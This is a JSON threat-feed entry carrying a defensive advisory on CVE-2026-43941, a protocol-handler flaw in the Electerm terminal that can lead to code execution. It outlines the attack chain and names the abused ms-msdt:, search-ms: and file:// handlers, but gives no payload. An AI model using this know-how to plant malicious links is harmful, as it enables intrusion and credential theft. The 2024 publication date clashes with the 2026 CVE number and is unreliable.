{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/electerm--3.8.15/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[{"cvss":9.6,"id":"CVE-2026-43941"}],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["electerm (\u003c= 3.8.15)"],"_cs_severities":["high"],"_cs_tags":["rce","terminal","protocol handler"],"_cs_type":"advisory","_cs_vendors":["electerm"],"content_html":"\u003cp\u003eElecterm, a cross-platform terminal application, is vulnerable to an arbitrary protocol execution vulnerability (CVE-2026-43941) in versions 3.8.15 and earlier. This flaw stems from the application\u0026rsquo;s failure to properly validate URLs passed to the \u003ccode\u003eshell.openExternal\u003c/code\u003e function. An attacker who can control terminal output, such as through a compromised SSH server or a malicious plugin, can inject a crafted URI into the terminal. If a user clicks on this malicious link, Electerm will execute it using the operating system\u0026rsquo;s default protocol handler, potentially leading to code execution, data exfiltration, or other malicious activities. This vulnerability requires user interaction (clicking the link) to be exploited.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker compromises a remote SSH server or injects malicious content into terminal output.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious URI containing a dangerous protocol handler like \u003ccode\u003ems-msdt:\u003c/code\u003e, \u003ccode\u003esearch-ms:\u003c/code\u003e, or \u003ccode\u003efile://\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe malicious URI is printed to the Electerm terminal connected to the compromised SSH server.\u003c/li\u003e\n\u003cli\u003eThe victim, using Electerm, views the terminal output containing the malicious URI.\u003c/li\u003e\n\u003cli\u003eThe victim clicks on the malicious URI hyperlink in the Electerm terminal.\u003c/li\u003e\n\u003cli\u003eElecterm\u0026rsquo;s \u003ccode\u003eshell.openExternal\u003c/code\u003e function executes the URI without proper validation.\u003c/li\u003e\n\u003cli\u003eThe operating system\u0026rsquo;s default protocol handler is invoked, executing the attacker\u0026rsquo;s payload (e.g., code execution via \u003ccode\u003ems-msdt:\u003c/code\u003e, NTLM hash leak via \u003ccode\u003efile://\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eAttacker achieves arbitrary code execution or exfiltrates sensitive information.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability (CVE-2026-43941) could allow an attacker to execute arbitrary code on a victim\u0026rsquo;s machine. This could lead to complete system compromise, data theft, or the installation of malware. The vulnerability affects all Electerm users who interact with untrusted terminal outputs. The number of potential victims is dependent on Electerm\u0026rsquo;s user base. If successfully exploited, an attacker gains the privileges of the user running Electerm.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Electerm Suspicious URI Invocation\u0026rdquo; to detect attempts to exploit CVE-2026-43941 by monitoring process creations with unusual protocol handlers (see rule definition below).\u003c/li\u003e\n\u003cli\u003eApply the workaround to disable hyperlink rendering in electerm\u0026rsquo;s terminal settings until a patch is available.\u003c/li\u003e\n\u003cli\u003eMonitor the electerm GitHub releases and security page for an update addressing this issue.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-07-03T12:00:00Z","date_published":"2024-07-03T12:00:00Z","id":"/briefs/2024-07-electerm-rce/","summary":"Electerm versions 3.8.15 and earlier are vulnerable to arbitrary code execution due to improper validation of URLs, allowing attackers to execute commands by tricking users into clicking malicious links in the terminal.","title":"Electerm Arbitrary Protocol Execution Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-07-electerm-rce/"}],"language":"en","title":"CraftedSignal Threat Feed — Electerm (\u003c= 3.8.15)","version":"https://jsonfeed.org/version/1.1"}